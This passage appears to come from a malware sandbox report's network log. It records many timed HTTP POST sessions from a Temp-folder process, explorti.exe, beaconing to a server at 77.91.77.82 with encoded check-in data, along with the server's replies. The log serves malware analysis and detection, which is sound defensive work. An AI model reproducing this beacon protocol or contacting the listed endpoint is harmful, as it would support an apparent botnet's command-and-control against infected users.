                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:17.192120075 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:17.421735048 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:17 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                43192.168.2.64976877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:17.538980007 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:18.214051962 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:18.220535994 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:18.434246063 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.64976977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:18.554506063 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:19.239140034 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:19.250669956 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:19.682662964 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0
                                                                Jul 3, 2024 08:39:19.682985067 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.64977077.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:19.802261114 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:20.502005100 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:20.503043890 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:20.725506067 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.64977177.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:20.833626032 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:21.515183926 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:21.516042948 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:21.733532906 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.64977377.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:21.849771023 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:22.534938097 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:22.537600040 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:22.753186941 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.64977477.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:22.864870071 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:23.566082954 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:23.567114115 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:23.788150072 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                49192.168.2.64977577.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:23.896105051 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:24.579269886 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:24.580159903 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:24.799880981 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                50192.168.2.64977677.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:24.911875010 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:25.599057913 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:25.600011110 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:25.819504976 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                51192.168.2.64977777.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:25.927493095 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:26.622308969 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:26.623471022 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:26.840954065 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                52192.168.2.64977877.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:26.958700895 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:27.644347906 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:27.647353888 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                Jul 3, 2024 08:39:27.862199068 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                53192.168.2.64977977.91.77.82801804C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 3, 2024 08:39:27.974234104 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 3, 2024 08:39:28.669585943 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Wed, 03 Jul 2024 06:39:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 3, 2024 08:39:28.670582056 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 160
                                                                Cache-Control: no-cache
